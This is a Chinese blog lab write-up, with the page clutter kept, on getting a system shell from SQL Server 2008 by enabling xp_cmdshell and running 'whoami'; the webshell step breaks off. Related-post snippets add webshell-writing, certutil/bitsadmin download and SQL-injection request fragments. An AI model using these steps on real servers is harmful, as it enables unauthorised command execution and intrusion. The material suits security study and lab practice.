【mssql实验】Mssqlgetshell

最新推荐文章于 2024-04-02 14:17:25 发布
最新推荐文章于 2024-04-02 14:17:25 发布
阅读量1.1k 收藏 1
点赞数 1
分类专栏: 杂项 文章标签: sqlserver sql 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59924300/article/details/123322356
版权

mssql简介:

ms SQL是指微软的SQLServer数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数据库。SQL Server一开始并不是微软自己研发的产品,而是当时为了要和IBM竞争时,与Sybase合作所产生的,其最早的发展者是Sybase,同时微软也和Sybase合作过 SQL Server 4.2版本的研发,微软亦将SQL Server 4.2移植到Windows NT(当时为3.1版),在与Sybase终止合作关系后,自力开发出SQL Server 6.0版,往后的SQL Server即均由微软自行研发

实验目的:

       实验mssqlgetshell的方式

环境

       Mssql2008

       DBeaver

环境搭建:

       Mssql2008下载安装参照

SQL Server 2008 R2 安装过程详解_明昕ztoy的博客-CSDN博客_sqlserver2008r2安装

SQL Server 2008 R2 安装过程详解_明昕ztoy的博客-CSDN博客_sqlserver2008r2安装

SQL Server 2008 R2 安装过程详解_明昕ztoy的博客-CSDN博客_sqlserver2008r2安装

 DBeaver安装参照

DBeaver安装_wwagyun的博客-CSDN博客_dbeaver安装教程

DBeaver安装_wwagyun的博客-CSDN博客_dbeaver安装教程

DBeaver安装_wwagyun的博客-CSDN博客_dbeaver安装教程

复现过程:

创建一个mssql的连接

然后进入sql编辑器

查看mssql版本

Select @@version;

查看所有数据库的名称

SELECT Name FROM Master..SysDatabases ORDER BY Name;

由于这个实验的mssql的版本是2008,所以xp_cmdshell默认是关闭的,(SQL Server 2005以后默认关闭,需要手动开启:)

输入

exec sp_configure;
查看exec sp_configure状态
 

可以看见xp_cmdshell是关闭的,需要我们手动去开启,输入下面命令开启xp_cmdshell
 

exec sp_configure 'show advanced options', 1; 
RECONFIGURE;  
exec sp_configure'xp_cmdshell', 1; 
RECONFIGURE; 
 

之后再查看xp_cmdshell的状态为config_vaule=1
 

 

输入下面命令让mssql执行系统命令
 

exec master..xp_cmdshell 'whoami';
 

 

可以看出已经执行系统命令了。
 

关闭xp_cmdshell的命令如下:
  
 

exec sp_configure 'show advanced options', 1; //开启高级选项
RECONFIGURE; //配置生效
exec sp_configure'xp_cmdshell', 0; //关闭xp_cmdshell
RECONFIGURE; //配置生效
当然我们也可以输入下面代码写入webshell(前提是知道网站的根目录)
 


                

        

        

    




    

      

        

            

              
                
                  FlynnAAAA
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    1
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    1
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
mssql 日志备份getshell

				
			

			

				

					qq_82303224_的博客
				

				

					04-24
					
					296
					
				

			

		

		

			
				
第二个disk = 写入webshell的网站物理地址。(根目录写不进去可以考虑网站上传目录)二:差异备份:(数据库很小时使用,大了会不成功)bitsadmin 下载文件并写入系统启动项。如果有waf的话可以考虑换个一句话写入。第一个disk = 有权限写入的目录。开启 xp_cmdshell。certutil 下载文件。

			
		

	



                

              
                



	

		

			

				
					
利用MSSQL getshell

					
热门推荐

				
			

			

				

					浅笑996的博客
				

				

					11-17
					
					1万+
					
				

			

		

		

			
				
此次复现使用的sql server 2000 和sql server 2008两个环境进行的
是在已知数据库密码的基础上进行的
0x01 MSSQL连接
连接MSSQL 2000
新建连接:

填写目的IP、目的端口、用户名、密码:

一直下一步,完成后,数据库导航窗口会出现一个连接,双击连接:
若是第一次连接,双击会提示下载驱动文件,若不成功,需多次反复尝试


新建SQL编辑器即可执行SQL语...

			
		

	



                


  
              

                


	

		

			

				
					
Mysql数据库getshell方法

				
			

			

				

					weixin_68408599的博客
				

				

					04-02
					
					1307
					
				

			

		

		

			
				
今天摸鱼时候,突然有人问我不同的数据库getshell的方式,一时间我想到了mysql还有redis未授权访问到getshell的方式,但是仅仅第一时间只想到了这两种,我有查了查资料,找到了上面两种数据库getshell的补充,以及其他数据库getshell的方式。因此更新一个专栏,各个数据库getshell的方式。

			
		

	





	

		

			

				
					
Mysql Getshell总结

				
			

			

				

					qq_51478862的博客
				

				

					05-05
					
					8592
					
				

			

		

		

			
				
获取网站根目录方式
(1) phpinfo() 页面:最理想的情况,直接显示web路径 (2) web报错信息:可以通过各种fuzz尝试让目标报错,也有可能爆出绝对路径 (3) 一些集成的web框架:如果目标站点是利用phpstudy、LAMPP等之类搭建的,可以猜测默认路径或者通过查看数据库保存的路径默认路径
winserver的iis默认路径c:\Inetpub\wwwroot
linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr.

			
		

	



		

			
		



	

		

			

				
					
mssql基础(二)——get shell的的方式

				
			

			

				

					7Riven's blog
				

				

					11-06
					
					554
					
				

			

		

		

			
				
测试环境windows-server-2003+sql sever2005

1.利用存储过程拿shell

允许修改高级参数:;exec sp_configure'show advanced options',1;



根据提示使用reconfigure语句进行安装



打开xp_cmdshell扩展:exec sp_configure'xp_cmdshell',1;



再次执行reco...

			
		

	





	

		

			

				
					
MATLAB访问MSSQL例子

				
			

			

				

					05-30
				

			

		

		

			
				
在MATLAB中访问MSSQL数据库,可以使用`database`工具箱中的`sqlserver`函数。上述例子是的MATLAB脚本示例,展示如何连接到MSSQL数据库并执行一个查询。 ### 注意事项:  1. 替换`你的服务器地址`、`你的数据库名`、`...

			
		

	





	

		

			

				
					
Kotlin访问MSSQL数据库

					
最新发布

				
			

			

				

					05-30
				

			

		

		

			
				
对于Kotlin访问MSSQL数据库,您可以使用Java的JDBC(Java数据库连接)来实现。附件是一个示例,演示了如何在Kotlin中使用JDBC连接到MSSQL数据库并执行查询, 请确保将yourServerName、yourDatabase、yourUsername、...

			
		

	





	

		

			

				
					
DBeaver连接MSSQL驱动

				
			

			

				

					04-02
				

			

		

		

			
				
【DBeaver连接MSSQL驱动详解】  DBeaver是一款跨平台、开源的数据库管理和开发工具,支持多种数据库系统,包括Microsoft SQL Server(MSSQL)。MSSQL驱动是DBeaver连接到SQL Server数据库的关键组件,使得用户可以...

			
		

	





	

		

			

				
					
MSSQL 数据库同步教程

				
			

			

				

					09-11
				

			

		

		

			
				
MSSQL数据库同步教程】  MSSQL数据库同步是一种通过数据库复制技术实现数据在多个位置实时或定期更新的方法。复制技术使得数据可以在多个服务器间共享,确保数据的一致性和可用性,尤其适用于分布式系统和灾难恢复...

			
		

	





	

		

			

				
					
Vue 访问MSSQL 数据库

				
			

			

				

					05-30
				

			

		

		

			
				
访问 MSSQL 数据库通常需要在后端服务中实现,因为 Vue.js 本身是一个前端框架,并不直接与数据库交互。但是,你可以使用 Vue.js 来发送 HTTP 请求到后端服务,然后由后端服务与 MSSQL 数据库进行交互。  附件例子...

			
		

	





	

		

			

				
					
【菜鸟腾飞】简单的Getshell和windows提权_漏洞研究

				
			

			

				

					11-01
				

			

		

		

			
				
【菜鸟腾飞】简单的Getshell和windows提权_漏洞研究【菜鸟腾飞】简单的Getshell和windows提权_漏洞研究

			
		

	





	

		

			

				
					
mssql数据库提权之——xp_cmdshell执行系统命令

				
			

			

				

					01-19
				

			

		

		

			
				
条件
所谓利用数据进行提权,利用的其实是数据库的运行权限,所以只要我们满足以下条件即可进行提权:
1、 必须获得sa的账号密码或者与sa相同权限的账号密码,且mssql没有被降权。
2、 必须可以以某种方式执行sql语句,例如:webshell或者是1433端口的连接。
提权基本思路过程与原理
1.MSSQL在Windows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比管理员小;而在2003以上的版本,则为最高权限。
2.获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码(某些站点直接在web应用程序中使

			
		

	





	

		

			

				
					
MySQL写Shell方法总结

				
			

			

				

					做自己喜欢的事,并将其发挥到极致!
				

				

					12-31
					
					4710
					
				

			

		

		

			
				
MySQL注入点,用工具对目标站点写入一句话shell,需要哪些前提条件?
**root权限以及网站的绝对路径**

outfile 和 dumpfile 写Shell
利用条件
·数据库当前用户为root权限
·知道当前网站的绝对路径
·PHP的GPC为OFF状态;(魔术引号,GET、POST、COOKIE)
`写入的那个路径要有写入权限

过滤了单引号into outfile 还可以用吗
不能,GPC要OFF才行,可以测试Hex编码

基于UNION联合查询
?id=1 UNION ALL SELECT

			
		

	





	

		

			

				
					
mssql 获取网站绝对路径写shell

				
			

			

				

					问题很多的小明
				

				

					08-13
					
					3141
					
				

			

		

		

			
				
1 存在sql注入

创建表


GET /get.asp?act_id=52;create+table+gogotest+(tmp+varchar(1000));----&user_name=123 HTTP/1.1

Host: 360gongfang.com

Connection: close

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel M

			
		

	





	

		

			

				
					
Mysql写shell的几种方式

				
			

			

				

					Redredredfish的博客
				

				

					08-23
					
					7680
					
				

			

		

		

			
				
Mysql写shell的几种方式
当我们拿到数据库权限时,可通过数据库管理工具写入webshell到目标服务器上,利用webshell控制目标服务器。
复现环境:
phpstudy_pro 8.1.0.6
mysql 5.7.26 root权限
网站绝对路径为D:\phpstudy_pro\WWW
利用方式:

通过outfile写入shell
尝试通过outfile写入文件

 报错[Code: 1290, SQL State: HY000]The MySQL server is running with

			
		

	





	

		

			

				
					
mssql拿shell

				
			

			

				

					m0_55772907的博客
				

				

					11-20
					
					771
					
				

			

		

		

			
				
getshell

			
		

	





	

		

			

				
					
LOAD语句:利用MSSQL中的xp_cmdshell功能,将指定文件夹下的指定文件,生成mysql的LOAD语句

				
			

			

				

					c_enhui的专栏
				

				

					09-24
					
					1389
					
				

			

		

		

			
				
LOAD语句:利用MSSQL中的xp_cmdshell功能,将指定文件夹下的指定文件,生成mysql的LOAD语句



declare @sql varchar(4000),
@dirpath varchar(1024),
@file_type varchar(16),
@target_table varchar(256);
select @target_table = '`AdConv

			
		

	





	

		

			

				
					
sqlserver命令注入和getshell

				
			

			

				

					计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
				

				

					11-12
					
					977
					
				

			

		

		

			
				
SqlServer基本注入需要知道的知识:
1、MSSql的系统自带数据库:master

2、在网站中,同一个网站一般不会跨库。

3、MSSql中每一个库都有一个系统自带表:sysobjects(这是系统对象表,保存当前数据库的对象)

4、注意sysobjects中的三个字段:NAME、XTYPE、ID

NAME字段是表名信息;

			
		

	





	

		

			

				
					
利用SQL命令下载文件

				
			

			

				

					等闲之辈 的 Gemini 's Blog
				

				

					09-22
					
					2921
					
				

			

		

		

			
				
 DECLARE @B varbinary(8000),@hr int,@http INT,@down INT EXEC sp_oacreate [Microsoft.XMLHTTP],@http output EXEC @hr = sp_oamethod @http,[Open],null,[GET],[http://192.168.1.178/a.htm],0 EXEC @hr = s

			
		

	





	

		

			

				
					
MSSQL报表服务.ppt

				
			

			

				

					11-12
				

			

		

		

			
				
MSSQL报表服务.ppt”涵盖了关于Microsoft SQL Server报表服务的全面介绍,包括其主要功能、使用场景以及报表的完整生命周期管理。该服务为企业提供了强大的报表解决方案,适用于内部报表、嵌入式报表以及B2B报表...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值